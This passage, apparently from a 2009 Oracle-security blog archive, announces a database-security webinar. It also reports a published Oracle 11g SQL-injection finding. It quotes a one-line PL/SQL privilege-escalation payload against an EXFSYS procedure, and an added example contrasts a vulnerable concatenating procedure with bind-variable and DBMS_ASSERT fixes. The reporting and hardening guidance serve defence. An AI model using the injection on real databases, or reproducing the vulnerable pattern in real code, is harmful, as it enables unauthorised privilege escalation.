Archive for January 21st, 2009

Webinar – Best Practices for Database Security

Wednesday, January 21st, 2009

Next Wednesday, 28 January 2009 (10:00 AM – 11:00 AM CET), I will give a free webinar, "Best Practices for Database Security", together with Sentrigo.

I will talk about typical problems in Oracle databases and how to avoid them…

See you next week…

Exploit for January CPU 2009 published

Wednesday, January 21st, 2009

Alexandr Polyakov, an Oracle security expert from Russia (reported findings in CPUJan2008, CPUJul2008), has posted details of one of his Oracle 11g findings on the dsecrg.com website.

By using the following PLSQL fragment

exec EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS('EXFSYS','EXF$VERSION','EXFVERSION','YYYYYYY'' and 1=EVILPROC()--')

it is possible to escalate privileges via SQL injection. More details (e.g. an extract from v$sql) can be found in their advisory.
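Why a quote inside that last argument matters, as an added example that is not from the original post or from the advisory: the procedures, table and column below are hypothetical and assume a definer-rights routine that builds dynamic SQL by concatenation, shown beside two hardened forms.

```sql
-- Hypothetical objects for illustration; this is not the EXFSYS package source.
CREATE TABLE demo_stats (part_name VARCHAR2(128), row_cnt NUMBER);

-- Vulnerable pattern: the parameter is concatenated into dynamic SQL.
-- A value containing a single quote ends the literal, and whatever follows
-- (for example a function call) is parsed as SQL and runs with the
-- privileges of the procedure owner, not those of the caller.
CREATE OR REPLACE PROCEDURE get_stats_concat (p_part IN VARCHAR2)
AUTHID DEFINER
AS
  v_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM demo_stats WHERE part_name = ''' || p_part || ''''
    INTO v_cnt;
  DBMS_OUTPUT.PUT_LINE('rows: ' || v_cnt);
END;
/

-- Hardened pattern 1: bind variable. The value is never parsed as SQL text.
CREATE OR REPLACE PROCEDURE get_stats_bind (p_part IN VARCHAR2)
AUTHID DEFINER
AS
  v_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM demo_stats WHERE part_name = :part'
    INTO v_cnt USING p_part;
  DBMS_OUTPUT.PUT_LINE('rows: ' || v_cnt);
END;
/

-- Hardened pattern 2: an identifier (schema, table, column) cannot be bound,
-- so validate it before splicing it in. DBMS_ASSERT.SIMPLE_SQL_NAME raises
-- an exception for anything that is not a simple SQL name.
CREATE OR REPLACE PROCEDURE count_rows (p_table IN VARCHAR2)
AUTHID CURRENT_USER
AS
  v_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM ' || DBMS_ASSERT.SIMPLE_SQL_NAME(p_table)
    INTO v_cnt;
  DBMS_OUTPUT.PUT_LINE('rows: ' || v_cnt);
END;
/
```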

Other advisories for the January 2009 CPU cover other Oracle Products like BEA Application Server, Oracle E-Business Suite and